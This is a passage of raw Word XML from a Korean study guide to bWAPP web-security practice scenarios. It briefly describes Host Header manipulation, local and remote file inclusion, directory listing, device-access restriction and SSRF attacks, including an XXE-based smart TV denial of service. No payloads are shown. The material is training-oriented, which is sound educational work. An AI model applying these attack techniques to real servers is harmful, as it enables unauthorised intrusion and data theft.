          </w:p>
          <w:p w14:paraId="574779E5" w14:textId="34EB786B" w:rsidR="00B73BF3" w:rsidRPr="0035631E" w:rsidRDefault="008A7C7B" w:rsidP="00735CB9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fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">-하나의 </w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>주소를 사용하는 웹-서버에 두 개 이상의 웹 서비스를 구현할 경우 가상 호스팅 기능을 사용하는데 이때 H</w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>ost Header</w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>를 이용하여 각각의 웹 도메인을 구분한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B562DC9" w14:textId="6E64056D" w:rsidR="00B73BF3" w:rsidRPr="0035631E" w:rsidRDefault="00B73BF3" w:rsidP="00735CB9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 xml:space="preserve">-이때 공격자가 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>Host Header</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>를 변조하면 피싱 사이트 접근,</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve"> XSS </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>실행,</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>암호 재설정과 같은 취약점이 발생</w:t>
            </w:r>
            <w:r w:rsidR="00A22F89" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>한다</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0906468D" w14:textId="5DFA69DC" w:rsidR="00A22F89" w:rsidRPr="0035631E" w:rsidRDefault="00B73BF3" w:rsidP="00735CB9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-</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>Host Header</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>를 변조하여 다른 사이트로 접근을 유도하는 시나리오이다.</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="4" w:name="D1"/>
          <w:bookmarkEnd w:id="4"/>
          <w:p w14:paraId="4EA14783" w14:textId="64DF0E0D" w:rsidR="00A22F89" w:rsidRPr="0035631E" w:rsidRDefault="002039EB" w:rsidP="00A22F89">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="a8"/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D2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4</w:t>
            </w:r>
            <w:r w:rsidR="00A22F89"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</w:rPr>
              <w:t>Local File Inc</w:t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</w:rPr>
              <w:t>l</w:t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</w:rPr>
              <w:t>u</w:t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</w:rPr>
              <w:t>sion</w:t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</w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00A22F89" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SQLiteManager)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C44F820" w14:textId="08FD9401" w:rsidR="00A22F89" w:rsidRPr="0035631E" w:rsidRDefault="002039EB" w:rsidP="00A22F89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lastRenderedPageBreak/>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00A22F89" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">-이 시나리오는 </w:t>
            </w:r>
            <w:r w:rsidR="00A22F89" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve">SQLite </w:t>
            </w:r>
            <w:r w:rsidR="00A22F89" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">관리자 페이지 </w:t>
            </w:r>
            <w:r w:rsidR="00A22F89" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve">‘main.php’, ‘index.php’ </w:t>
            </w:r>
            <w:r w:rsidR="00A22F89" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">취약점을 이용하여 </w:t>
            </w:r>
            <w:r w:rsidR="00A22F89" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r w:rsidR="00A22F89" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>를 실행하는 내용이다.</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="5" w:name="E1"/>
          <w:bookmarkEnd w:id="5"/>
          <w:p w14:paraId="34C58325" w14:textId="6284E07C" w:rsidR="00A22F89" w:rsidRPr="0035631E" w:rsidRDefault="00CB76E6" w:rsidP="00C33C57">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="a8"/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E2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C33C57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4"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C33C57" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00C33C57" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Remote &amp;</w:t>
            </w:r>
            <w:r w:rsidR="00C33C57" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C33C57" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lo</w:t>
            </w:r>
            <w:r w:rsidR="00C33C57" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidR="00C33C57" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>al File Inclusion (RFI/LFI)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E478256" w14:textId="6056F63D" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00CB76E6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  <w:r w:rsidR="00C21A23" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">-이 시나리오는 </w:t>
            </w:r>
            <w:r w:rsidR="00C21A23" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve">RFI/LFI </w:t>
            </w:r>
            <w:r w:rsidR="00C21A23" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>취약점을 이용하여 서버 안에 있는 정보를 획득하는 내용이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD40D40" w14:textId="56E5F8A1" w:rsidR="00C33C57" w:rsidRPr="0035631E" w:rsidRDefault="00C33C57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-</w:t>
            </w:r>
            <w:r w:rsidR="00305A28" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidR="00305A28" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidR="00305A28" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve">I(Remote File Inclusion) : </w:t>
            </w:r>
            <w:r w:rsidR="00305A28" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>외부 서버에 있는 악의적인 파일을 이용하여 내부 서버에 있는 정보를 획득하는 방식</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05348D5E" w14:textId="77777777" w:rsidR="00341A30" w:rsidRPr="0035631E" w:rsidRDefault="00305A28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-</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>LFI(Local File Inclusion)</w:t>
            </w:r>
            <w:r w:rsidR="00341A30" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve"> : </w:t>
            </w:r>
            <w:r w:rsidR="00341A30" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>내부 서버 자체적인 취약점을 이용하여 내부 서버에 있는 정보를 획득하는 방식</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="6" w:name="F1"/>
          <w:bookmarkEnd w:id="6"/>
          <w:p w14:paraId="07103860" w14:textId="64781326" w:rsidR="00EE40AF" w:rsidRPr="0035631E" w:rsidRDefault="00CB76E6" w:rsidP="00C33C57">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="a8"/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F2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EE40AF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4"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00EE40AF"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="00EE40AF" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidR="00EE40AF" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">estrict Device </w:t>
            </w:r>
            <w:r w:rsidR="00EE40AF" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00EE40AF" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ccess</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538637DB" w14:textId="6BCA2BAB" w:rsidR="00EE40AF" w:rsidRPr="0035631E" w:rsidRDefault="00CB76E6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  <w:r w:rsidR="00EE40AF" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00EE40AF" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>모바일이나 태블릿 등의 모바일 기기로 접속하여야 내용을 출력한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D9B9DC7" w14:textId="77777777" w:rsidR="00EE40AF" w:rsidRPr="0035631E" w:rsidRDefault="00EE40AF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 xml:space="preserve">따라서 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>PC</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>로 접근하면 모바일이 아니라는 경고 메시지를 출력한다.</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="7" w:name="G1"/>
          <w:bookmarkEnd w:id="7"/>
          <w:p w14:paraId="03A4CD29" w14:textId="18FE1AE0" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00A5041C" w:rsidP="00C33C57">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="a8"/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G2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CA7C4B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4"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00CA7C4B" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>. Restrict Folder Ac</w:t>
            </w:r>
            <w:r w:rsidR="00CA7C4B" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidR="00CA7C4B" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ess</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD17BD2" w14:textId="7739B7AB" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00A5041C" w:rsidP="00CA7C4B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  <w:r w:rsidR="00CA7C4B" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-디렉토리 브라우징 또는 디렉토리 리스팅이라고</w:t>
            </w:r>
            <w:r w:rsidR="00F577E0" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CA7C4B" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>하며 웹 서버의 디렉토리 목록이 노출되어 접근이 가능한 취약점이다. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1187F55E" w14:textId="60AE5F56" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00CA7C4B" w:rsidP="00CA7C4B">
            <w:pPr>
              <w:rPr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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-Linuux Apache와 Windows IIS에서 디렉토리 검색 기능이 활성화되어 있는 경우 취약점이 발생한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F63B25D" w14:textId="77777777" w:rsidR="00CA7C4B" w:rsidRPr="0035631E" w:rsidRDefault="00F37367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-이 시나리오는 웹-서버 디렉토리 검색 기능이 활성화되어 있는 경우 디렉토리 접근이 가능한 내용이다</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="8" w:name="H1"/>
          <w:bookmarkEnd w:id="8"/>
          <w:p w14:paraId="432385BD" w14:textId="1536BB03" w:rsidR="0056616F" w:rsidRPr="0035631E" w:rsidRDefault="003866B2" w:rsidP="00C33C57">
            <w:pPr>
              <w:rPr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/>
                <w:sz w:val="40"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FE13B7" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:instrText>HYPERLINK  \l "H2"</w:instrText>
            </w:r>
            <w:r w:rsidR="00FE13B7" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"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sz w:val="40"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="0056616F"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="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">erver </w:t>
            </w:r>
            <w:r w:rsidR="00A508B7" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ide Request Forgery(SSRF)</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4A5814" w14:textId="5630A85F" w:rsidR="000606F4" w:rsidRPr="0035631E" w:rsidRDefault="000606F4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  <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>공격자가 변조된 요청을 서버에게 전송하여 서버가 내부망에 악의적인 요청을 보내는 취약점이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23B8185C" w14:textId="1BA26F5C" w:rsidR="000606F4" w:rsidRPr="0035631E" w:rsidRDefault="000606F4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-이를 통해 내부망 접근,</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>스캔,</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>보안 장비 우회가 가능하게 된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22A6D593" w14:textId="1E6FA2C5" w:rsidR="0056616F" w:rsidRPr="0035631E" w:rsidRDefault="000606F4" w:rsidP="00C33C57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-</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">이 시나리오는 </w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF </w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">취약점 중에 </w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>RFI</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>를 이용한 포트 스캔,</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve"> XEE</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>를 이용한 내부망 자원 접근,</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve"> XEE</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>를 이용한 삼성스마트</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>를</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve">TV Dos </w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>공격하는 내용이다.</w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve"> bWAPP </w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">내부망에 다른 시스템이 없기 때문에 </w:t>
            </w:r>
